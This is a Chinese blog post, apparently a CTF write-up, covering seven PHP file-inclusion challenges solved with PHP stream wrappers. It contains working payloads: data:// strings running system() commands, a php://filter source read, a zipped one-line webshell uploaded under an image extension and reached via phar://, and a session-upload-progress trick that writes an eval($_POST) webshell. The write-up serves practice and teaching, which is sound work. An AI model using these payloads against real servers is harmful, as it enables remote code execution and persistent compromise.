记一次文件包含刷题(伪协议篇)

每种协议的具体用法可自行查阅,这里只做分析

第一题

未做任何防护,访问文件就能拿到flag

第二题

未告诉flag文件名,便考虑进行命令执行

使用php://input绕过,进行命令执行

第三题

allow_url_fopen :on

allow_url_include:on

发现上面两个条件都为on,便考虑data://

data://text/plain,<?php system('ls'); ?>

data://text/plain,<?php system('cat flag_21843732549.txt'); ?>

第四题

告诉flag的地址,但是不显示文件内容,考虑用php://filter进行读取

php://filter/convert.base64-encode/resource=flag.php

读取解码便是flag

第五题

通过观察代码发现这里对传入的参数进行了二次读取,所以也用php://input

然后传入参数进行匹配就好了

第六题

发现有文件上传点,并且支持zip文件上传,便考虑phar://和zip://

先将一句话木马shell.php压缩成shell.zip,并且上传。

如果不让上传zip文件,那就将shell.zip的后缀改成png或者jpg再上传。

用蚁剑连接http://x.x.x/?file=phar://uploads/8519c12b20eb3f740c896055a5cec49a.zip/shell

第七题

根据观察可以发现这是一个利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含的题目

1.**当session.upload_progress.enabled = On时,**表示当浏览器向服务器上传一个文件时,PHP将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中

2.保存的路径在session.save_path

  1. 当session.use_strict_mode=Off时,PHPSESSID的值可控

4.默认会根据PHPSESSID生成一个文件 ,假设我传入为123,那么便会在/var/lib/php/sessions下生成一个sess_123文件来记录临时信息

5.当session.upload_progress.cleanup=On时,生成的sess_123文件会在上传完毕后强制删除,这时候我们需要在上传完成前去访问缓存.

6.我们通过传入PHPSESSID=123,生成一个sess_123文件。

然后修改PHP_SESSION_UPLOAD_PROGRESS,也就是参数a。来传入php代码。

最后利用include包含sess_123文件,来达到执行的目的。

传如的代码会生成一个木马文件,接着连接上就好了。

<?php fputs(fopen("456.php", "w"), '<?php @eval($_POST["shell"]); ?>'); ?>

相关推荐
心之所想,行之将至几秒前
零基础开始学习鸿蒙开发-交友软件页面设计
学习·交友
打鱼又晒网1 小时前
linux网络套接字 | 深度解析守护进程 | 实现tcp服务守护进程化
linux·网络协议·计算机网络·tcp
biter00881 小时前
opencv(15) OpenCV背景减除器(Background Subtractors)学习
人工智能·opencv·学习
Code哈哈笑2 小时前
【Java 学习】深度剖析Java多态:从向上转型到向下转型,解锁动态绑定的奥秘,让代码更优雅灵活
java·开发语言·学习
QQ同步助手3 小时前
如何正确使用人工智能:开启智慧学习与创新之旅
人工智能·学习·百度
流浪的小新3 小时前
【AI】人工智能、LLM学习资源汇总
人工智能·学习
A懿轩A4 小时前
C/C++ 数据结构与算法【数组】 数组详细解析【日常学习,考研必备】带图+详细代码
c语言·数据结构·c++·学习·考研·算法·数组
独行soc11 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍06-基于子查询的SQL注入(Subquery-Based SQL Injection)
数据库·sql·安全·web安全·漏洞挖掘·hw
南宫生12 小时前
力扣-图论-17【算法学习day.67】
java·学习·算法·leetcode·图论
sanguine__12 小时前
Web APIs学习 (操作DOM BOM)
学习